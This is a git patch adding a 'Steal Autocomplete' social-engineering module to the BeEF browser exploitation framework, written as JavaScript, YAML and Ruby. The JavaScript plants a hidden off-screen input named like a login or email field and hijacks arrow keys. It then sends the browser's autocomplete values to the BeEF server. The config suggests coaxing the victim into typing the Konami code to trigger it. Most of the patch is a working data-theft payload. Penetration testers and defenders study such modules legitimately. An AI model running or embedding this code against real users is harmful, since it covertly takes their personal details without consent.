From 19d1827c362f48561fc3756dc9aa8ca880c2140d Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 08:51:04 +1030
Subject: [PATCH] Add 'Steal Autocomplete' module

Part of issue #601
---
 .../autocomplete_theft/command.js             | 75 +++++++++++++++++++
 .../autocomplete_theft/config.yaml            | 16 ++++
 .../autocomplete_theft/module.rb              | 49 ++++++++++++
 3 files changed, 140 insertions(+)
 create mode 100644 modules/social_engineering/autocomplete_theft/command.js
 create mode 100644 modules/social_engineering/autocomplete_theft/config.yaml
 create mode 100644 modules/social_engineering/autocomplete_theft/module.rb

diff --git a/modules/social_engineering/autocomplete_theft/command.js b/modules/social_engineering/autocomplete_theft/command.js
new file mode 100644
index 000000000..ffcb1677c
--- /dev/null
+++ b/modules/social_engineering/autocomplete_theft/command.js
@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	steal_autocomplete = function() {
+
+		var results = [];
+
+		// hijack keys and set focus
+		get_autocomplete = function (){
+			window.addEventListener("keydown",function(e){
+				switch(e.keyCode) {
+					case 37: // left
+						scrollTo(window.pageXOffset-20, window.pageYOffset);
+					break;
+					case 38: // up
+						scrollTo(window.pageXOffset, window.pageYOffset-20);
+					break;
+					case 39: // right
+						scrollTo(window.pageXOffset+20, window.pageYOffset);
+					break;
+					case 40: // down
+						scrollTo(window.pageXOffset, window.pageYOffset+20);
+					break;
+					default:break;
+				}
+			},false);
+			document.getElementById("placeholder").focus();
+			
+		}
+
+		inArray = function(el, arr){
+			for (var i = 0;i < arr.length;i++)
+				if (el===arr[i])
+					return true;   
+			return false;
+		}
+
+		steal = function(n,v) {
+			var val = JSON.stringify({'input':n,'value':v});
+			if (v != "" && !inArray(val,results)){
+				results.push(val);
+				//console.log(val);
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val);
+			}
+		}
+
+		tt = function(ev) {
+			if (ev.keyCode == 37 || ev.keyCode == 39) setTimeout(function(){ ev.target.blur(); },100);
+		}
+
+		// create hidden input element
+		input = document.createElement('input');
+		input.setAttribute("id",    "placeholder");
+		input.setAttribute("name",  "<%= @input_name %>");
+		input.setAttribute("style", "position:relative;top:-1000px;left:-1111px;width:1px;height:1px;border:none;");
+		input.setAttribute("type",  "text");
+		input.onkeyup   = function(event) { tt(event); }
+		input.onkeydown = function(event) { tt(event); }
+		input.onblur    = function(event) { steal(this.name,this.value);var o=this;setTimeout(function(){ o.focus();},100);this.value = "";document.body.removeChild(this); }
+		document.body.appendChild(input);
+
+		// steal autocomplete
+		get_autocomplete();
+
+	}
+
+	setTimeout("steal_autocomplete();", 100);
+
+});
+
diff --git a/modules/social_engineering/autocomplete_theft/config.yaml b/modules/social_engineering/autocomplete_theft/config.yaml
new file mode 100644
index 000000000..b79eac020
--- /dev/null
+++ b/modules/social_engineering/autocomplete_theft/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        steal_autocomplete:
+            enable: true
+            category: "Social Engineering"
+            name: "Steal Autocomplete"
+            description: "This module steals autocomplete values from Firefox. The user must press the up or down arrow keys twice, followed by the left or right arrow key, in order to steal autocomplete information.<br/>Hint: Try convincing the user to enter the Konami code (Up, Up, Down, Down, Left, Right, Left, Right, B, A, Enter)."
+            authors: ["Stefano Di Paola", "bcoles"]
+            target:
+                working: ["FF"]
+                not_working: ["ALL"]
diff --git a/modules/social_engineering/autocomplete_theft/module.rb b/modules/social_engineering/autocomplete_theft/module.rb
new file mode 100644
index 000000000..45ab2f35d
--- /dev/null
+++ b/modules/social_engineering/autocomplete_theft/module.rb
@@ -0,0 +1,49 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# Based on the PoC by Stefano Di Paola
+# Ported to BeEF by bcoles
+# For more information see: http://blog.mindedsecurity.com/2011/10/autocompleteagain.html
+################################################################################
+class Steal_autocomplete < BeEF::Core::Command
+
+	def self.options
+		return [
+			{	'name'         => 'input_name',
+				'type'         => 'combobox',
+				'ui_label'     => 'Input Field Name',
+				'store_type'   => 'arraystore',
+				'store_fields' => ['element_name'],
+				'store_data'   => [
+					['login'],
+					['email'],
+					['Email'],
+					['session[username_or_email]'],
+					['q'],
+					['search'],
+					['name'],
+					['company'],
+					['city'],
+					['state'],
+					['country'],
+				],
+				'emptyText'    => 'Select an input field name to steal autocomplete values',
+				'valueField'   => 'element_name',
+				'displayField' => 'element_name',
+				'mode'         => 'local',
+				'autoWidth'    => true
+			}
+		]
+	end
+
+	def post_execute
+		content = {}
+		content['results'] = @datastore['results']
+		save content
+	end
+
+end
+